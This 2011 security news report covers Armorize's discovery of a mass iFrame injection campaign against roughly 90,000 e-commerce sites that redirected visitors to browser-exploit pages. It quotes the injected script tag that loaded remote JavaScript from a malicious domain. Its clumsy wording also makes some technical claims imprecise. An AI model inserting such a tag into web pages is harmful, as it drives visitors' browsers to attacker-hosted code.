Armorize Unleash Massive Iframe Injection Assault

Investigators at Armorize, a security company claimed that they have detected one huge iFrame Injection assault due to which 90,000 or more websites largely related to e-commerce have been compromised, as reported by Help Net Security on July 26, 2011.

Notably, during attacks involving iFrame, malware programs are serially injected into an Internet site which downloads data from some other website. Normally iFrames do not cause any harm, however, if rogue cyber-crooks avail them, they could be used in covert manners for trapping victims.

According to the investigators, the latest iFrames injected into the target websites take onto account one special website named Willysy.

Several diversions along with JavaScript implantations due to more iFrames lead Web-surfers onto a site that is hosted on a domain called arhyv.ru so that several attack codes on that site may exploit security flaws inside the surfers' Web-browsers.

Security experts also claimed that the early iFrames were after sometime replaced with the "<script src=http://exero.eu/catalog/jquery.js></script>" malicious code.

Moreover, iFrame assault of the above kind is also known as mass-injection assault that abuses flaws within Microsoft's IE, Adobe's PDF, Java, and other widely-used applications. It has been aiming at e-commerce websites containing Open Source software that around 249,000 Internet store proprietors use.

Further, as per the investigators, if an infection attempt is unsuccessful, then the inserted iFrame is provided in the form of content instead of being run within the website's caption.

And when any Web-surfer ends up on a website having a contaminated iFrame, there is an automatic way in which the iFrame uploads down nasty malicious programs on the compromised computer. However, this does not happen with users of Safari and Firefox. Researchers currently declared the website as one attack site as also blocked it too.

Meanwhile, the Armorize investigators have not articulated the name of the malicious code which is being provided for download.

However, they suggest that the new iFrame injection assault can be avoided with a powerful AV application that is maintained up-to-date. One extra precaution incase of being contaminated with the iFrame, can be for having a dedicated admin account that only loads software or an ordinary personal account which does not load software.

» SPAMfighter News - 8/5/2011